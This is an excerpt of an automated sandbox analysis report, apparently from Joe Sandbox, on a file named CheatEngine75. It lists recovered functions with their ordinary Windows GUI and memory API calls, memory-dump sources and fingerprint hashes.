                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                                                                                                                                      • String ID: 0#Lk$BufferedPaintUnInit$uxtheme.dll
                                                                                                                                                                                                                                      • API String ID: 2061474489-2281920405
                                                                                                                                                                                                                                      • Opcode ID: 293c5c873c5c82df37e53edd7b42cc82a65f6c21b82edde0c3a090713fc9c46c
                                                                                                                                                                                                                                      • Instruction ID: e5dc423175346617749f333aa87c084d1ea06c57c99804e430da373dfc94114f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 293c5c873c5c82df37e53edd7b42cc82a65f6c21b82edde0c3a090713fc9c46c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E06576B115329BEF207B7598188AA77E8AF426423067061FC12D7354DB38CC4247A0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6B50293A
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6B694B00,00000018,6B52DA81,?,?,?,00000000,?,?,?,?,?,00000000), ref: 6B50295D
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000018), ref: 6B5029AC
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6B694B00,?,?,00000000), ref: 6B5029C9
                                                                                                                                                                                                                                      • CreateBitmap.GDI32(?,-00000002,00000001,00000001,00000000), ref: 6B5029F1
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000), ref: 6B502A00
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 6B502A7E
                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,?,-00000002), ref: 6B502A9E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Create$BitmapCompatibleCriticalObjectSectionSelect$EnterH_prolog3Leave
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4255533662-0
                                                                                                                                                                                                                                      • Opcode ID: f0df906509d96f83557113beddbbf362458cef5e952867f5bb64bb2c0d4df263
                                                                                                                                                                                                                                      • Instruction ID: 1d7fbcf84e8b7b4a00c12d7f21197a0b8582703a0e4778d19c2e952dabd82e7f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0df906509d96f83557113beddbbf362458cef5e952867f5bb64bb2c0d4df263
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56517A70600B01DBEB34DF66C950BABB7F4FF05314B00496DE96686650DFBAE880CB20
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 6B4D3B01
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6B4C37F5,00000010,6B4D3A28,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3B12
                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3B2E
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000010,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3B96
                                                                                                                                                                                                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000010,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3BAB
                                                                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000,6B4C37F5), ref: 6B4D3BDC
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3BFA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocCriticalLocalSectionValue$EnterH_prolog3_catchLeave
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1707010094-0
                                                                                                                                                                                                                                      • Opcode ID: 861415d54e2cd2adcc197fef3e543a8fdce37f194be65747d7ee39f74f7a39af
                                                                                                                                                                                                                                      • Instruction ID: 63dca0002a8f5eeece4beba3dcd1bbe4ea7d8e834d408ffcc7866be99e166dc2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 861415d54e2cd2adcc197fef3e543a8fdce37f194be65747d7ee39f74f7a39af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B31E3719007019FDB359F6AC896F5B7BB1EF84720B10856EE8159B362CB39E900CF91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RealChildWindowFromPoint.USER32(?,?,?), ref: 6B4D9893
                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 6B4D98AE
                                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 6B4D98B7
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 6B4D98C7
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 6B4D98D7
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 6B4D98F5
                                                                                                                                                                                                                                      • PtInRect.USER32(?,?,?), ref: 6B4D9905
                                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 6B4D9914
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$ChildClientCtrlFromLongPointRealScreen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 151369081-0
                                                                                                                                                                                                                                      • Opcode ID: e903c22e2525a49562de3c6666ddc0141f47523e74d2b35b1e6a16d3d42965d3
                                                                                                                                                                                                                                      • Instruction ID: 78d3dd15a730a163217fc5ca3b5f671eb4a57494007a34d6de74c1aa4099a245
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e903c22e2525a49562de3c6666ddc0141f47523e74d2b35b1e6a16d3d42965d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF21957190161AABCF119FA9CC59EEF7BB8EF0A710F104169F411E3350D738DA418BA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 6B4D0A94
                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(00000000,?), ref: 6B4D0AA5
                                                                                                                                                                                                                                      • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6B4D0ABA
                                                                                                                                                                                                                                      • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6B4D0ADA
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6B4D0AE2
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 6B4D0AEC
                                                                                                                                                                                                                                      • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6B4D0AFD
                                                                                                                                                                                                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6B4D0B15
                                                                                                                                                                                                                                        • Part of subcall function 6B4D95A1: GlobalFlags.KERNEL32(?), ref: 6B4D95AE
                                                                                                                                                                                                                                        • Part of subcall function 6B4D95A1: GlobalUnlock.KERNEL32(?), ref: 6B4D95BC
                                                                                                                                                                                                                                        • Part of subcall function 6B4D95A1: GlobalFree.KERNEL32(?), ref: 6B4D95C8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 168474834-0
                                                                                                                                                                                                                                      • Opcode ID: 770dde39e80e19e4d18af74d4a84b7c7081561061643fcbb1b239898a95da099
                                                                                                                                                                                                                                      • Instruction ID: de2bdc6d8ae4ef013c92b8b88de6ede0c8c18b24df2dc36890d48d82008c5223
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 770dde39e80e19e4d18af74d4a84b7c7081561061643fcbb1b239898a95da099
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F118CB1404608BFEF125FB1CDA5EAA7BEDEF00748B000469F61191231DB39DA50EB20
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalSize.KERNEL32(?), ref: 6B4CEA55
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002002,00000000), ref: 6B4CEA6D
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(?), ref: 6B4CEA7D
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(?), ref: 6B4CEA86
                                                                                                                                                                                                                                      • GlobalSize.KERNEL32(?), ref: 6B4CEA93
                                                                                                                                                                                                                                        • Part of subcall function 6B4CEE53: _memcpy_s.LIBCMT ref: 6B4CEE62
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 6B4CEAA4
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 6B4CEAAD
                                                                                                                                                                                                                                      • GlobalSize.KERNEL32(?), ref: 6B4CEABD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Size$LockUnlock$Alloc_memcpy_s
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3833998449-0
                                                                                                                                                                                                                                      • Opcode ID: 475e3f91a1e202869379a4af85ba3581d6fe31dd0390359931d7c055fb8874f0
                                                                                                                                                                                                                                      • Instruction ID: 5d1439e931b808f8e9840927be9a2f3e98e1a3a8a54a636d2792a439a0b405bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 475e3f91a1e202869379a4af85ba3581d6fe31dd0390359931d7c055fb8874f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A012C76540214BFEF217BE68C8DC9B7EACEF46AA17005024F909D2321D739D9008761
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strrchr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                                                                                                                      • Opcode ID: 716d64431459630ae1e75006e040eb2c1dd6adb019f08989e039c79630bedc66
                                                                                                                                                                                                                                      • Instruction ID: 5d4c1d7e10ea19dc4fd473bdd4ce1683cd8ff7206611ddb5b301e14090c104bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 716d64431459630ae1e75006e040eb2c1dd6adb019f08989e039c79630bedc66
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DB15BB2D093959FDB058F6CCC81BEE7BB6EF45310F148195E524AB281D37C9949CBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000120C,00000000,00000002), ref: 6B4F1884
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000120C,00000001,00000002), ref: 6B4F18B9
                                                                                                                                                                                                                                      • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 6B4F18DF
                                                                                                                                                                                                                                      • GetCapture.USER32 ref: 6B4F196E
                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 6B4F1978
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CaptureMessageSend$RedrawReleaseWindow
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 2167886739-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 8190b4da4d14cd16de27596d90941c1c4d1de118ffe90abac23e0283894ea415
                                                                                                                                                                                                                                      • Instruction ID: 42eff08e1186bd0f843bc8e329941d277b1ccf2d436946dc68f61ab2039e55b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8190b4da4d14cd16de27596d90941c1c4d1de118ffe90abac23e0283894ea415
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B41AF757002219FDF09AF65C894FAD77B9FF88760F0400A9E906E7390DB74A942CBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 6B4FE906
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4BD7: __EH_prolog3.LIBCMT ref: 6B4D4BDE
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4BD7: GetWindowDC.USER32(00000000,00000004,6B4FD606,00000000), ref: 6B4D4C0A
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 6B4FE93E
                                                                                                                                                                                                                                      • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6B4FE9C7
                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 6B4FE9E1
                                                                                                                                                                                                                                        • Part of subcall function 6B4D5D43: SelectObject.GDI32(?,6B530896), ref: 6B4D5D4C
                                                                                                                                                                                                                                      • FillRect.USER32(?,00000000,-00000098), ref: 6B4FEA2C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Create$Compatible$BitmapFillH_prolog3H_prolog3_ObjectRectSectionSelectWindow
                                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                                      • API String ID: 2680359821-3887548279
                                                                                                                                                                                                                                      • Opcode ID: 02644a66e83cde05aa45fa26ae1bf0175cea0520750f10c6c05f5abb97330f49
                                                                                                                                                                                                                                      • Instruction ID: 5e07da971ee183086481d3e59416cf2106c83932dc7c3912da6d86f935de1785
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02644a66e83cde05aa45fa26ae1bf0175cea0520750f10c6c05f5abb97330f49
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 055103B1D10218ABEF14CFA5C886BAEBBB9FF44305F10812EE415AB290DB789945CF50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 6B54785F
                                                                                                                                                                                                                                      • GetKeyboardLayout.USER32(00000000), ref: 6B54789C
                                                                                                                                                                                                                                      • MapVirtualKeyExW.USER32(?,00000000,00000000), ref: 6B5478A5
                                                                                                                                                                                                                                      • GetKeyNameTextW.USER32(00000000,?,00000032), ref: 6B5478CC
                                                                                                                                                                                                                                      • IsCharLowerW.USER32(?,?,00000000), ref: 6B547909
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharH_prolog3_KeyboardLayoutLowerNameTextVirtual
                                                                                                                                                                                                                                      • String ID: Pause
                                                                                                                                                                                                                                      • API String ID: 2563161834-375111145
                                                                                                                                                                                                                                      • Opcode ID: 577113484ddbfc6c9fe233f4a3803dfabde9980c998b9cc55ff96401d49211d6
                                                                                                                                                                                                                                      • Instruction ID: f77f4e481ef2e5030b95591849c4e9917b68dcf1417eeb104c4023abb7d0a542
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 577113484ddbfc6c9fe233f4a3803dfabde9980c998b9cc55ff96401d49211d6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED319172C00118AAFB25DBB5C845EEEB778EF89704F10446EE461A7081DF78AA45DBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 6B500B6C
                                                                                                                                                                                                                                        • Part of subcall function 6B4D957B: DeleteObject.GDI32(?), ref: 6B4D958D
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 6B500B81
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B500BE7
                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 6B500BF6
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6B694B00), ref: 6B500C0D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$Delete$Select$CriticalLeaveSection
                                                                                                                                                                                                                                      • String ID: (6dk
                                                                                                                                                                                                                                      • API String ID: 3849354926-3218462620
